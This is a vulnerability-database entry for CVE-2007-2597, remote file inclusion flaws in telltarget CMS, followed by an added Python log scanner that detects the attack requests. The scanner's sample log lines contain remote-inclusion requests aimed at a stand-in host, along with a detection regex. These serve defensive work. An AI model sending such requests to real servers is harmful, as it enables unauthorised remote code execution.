CVE-2007-2597
telltarget_cms < 1.3.3 - Remote File Inclusion via Multiple Parameters
Exploitation Summary
EIP tracks 1 public exploit for CVE-2007-2597. PoCs published by GoLd_M.
AI-analyzed exploit summary: The exploit demonstrates multiple remote file inclusion vulnerabilities in telltarget CMS 1.3.3 by manipulating the 'ordnertiefe' and 'tt_docroot' parameters to include arbitrary shell files. The attack leverages improper input validation in PHP scripts to execute remote code.
Description
Multiple PHP remote file inclusion vulnerabilities in telltarget CMS 1.3.3 allow remote attackers to execute arbitrary PHP code via a URL in the (1) ordnertiefe parameter to site_conf.php; or the (2) tt_docroot parameter to (a) class.csv.php, (b) produkte_nach_serie.php, or (c) ref_kd_rubrik.php in functionen/; (d) hg_referenz_jobgalerie.php, (e) surfer_anmeldung_NWL.php, (f) produkte_nach_serie_alle.php, (g) surfer_aendern.php, (h) ref_kd_rubrik.php, or (i) referenz.php in module/; or (j) 1/lay.php or (k) 3/lay.php in standard/.
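A log check for the request pattern in the description, as an added example (not part of the original entry or of the exploit it tracks): it flags requests to the listed scripts whose `ordnertiefe` or `tt_docroot` query parameter carries a URL scheme. The access-log format, sample lines and host names are constructed, and matching scripts by path suffix is an assumption about where the CMS is installed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script path suffixes and parameters taken from the CVE-2007-2597 description.
TT_DOCROOT_SCRIPTS = (
    "functionen/class.csv.php", "functionen/produkte_nach_serie.php",
    "functionen/ref_kd_rubrik.php", "module/hg_referenz_jobgalerie.php",
    "module/surfer_anmeldung_NWL.php", "module/produkte_nach_serie_alle.php",
    "module/surfer_aendern.php", "module/ref_kd_rubrik.php",
    "module/referenz.php", "standard/1/lay.php", "standard/3/lay.php",
)
AFFECTED = {"site_conf.php": "ordnertiefe"}
AFFECTED.update({script: "tt_docroot" for script in TT_DOCROOT_SCRIPTS})

# These parameters feed an include path; a scheme or UNC-style prefix is never expected.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_param(target):
    """Return (script, param, decoded value) for a matching request target, else None."""
    parts = urlsplit(target)
    for script, param in AFFECTED.items():
        if not parts.path.endswith("/" + script):
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == param and REMOTE_VALUE.match(value):  # parse_qsl percent-decodes
                return script, param, value
    return None

def scan(lines):
    """Return (line number, script, param, value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hit = suspicious_param(match.group(1)) if match else None
        if hit:
            hits.append((number, *hit))
    return hits

# Constructed sample lines: two flagged, two not (no parameter / no scheme in value).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2007:10:00:01 +0000] "GET /cms/site_conf.php?ordnertiefe=http://files.example.invalid/x.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/May/2007:10:00:04 +0000] "GET /shop/module/referenz.php?id=4&tt_docroot=hTTp%3A%2F%2Ffiles.example.invalid%2Fa HTTP/1.0" 200 87',
    '198.51.100.20 - - [10/May/2007:10:01:12 +0000] "GET /cms/module/referenz.php?id=4 HTTP/1.1" 200 4096',
    '198.51.100.20 - - [10/May/2007:10:01:15 +0000] "GET /cms/site_conf.php?ordnertiefe=../ HTTP/1.1" 200 20',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the query string, so the same parameters sent in a POST body are outside what this check sees.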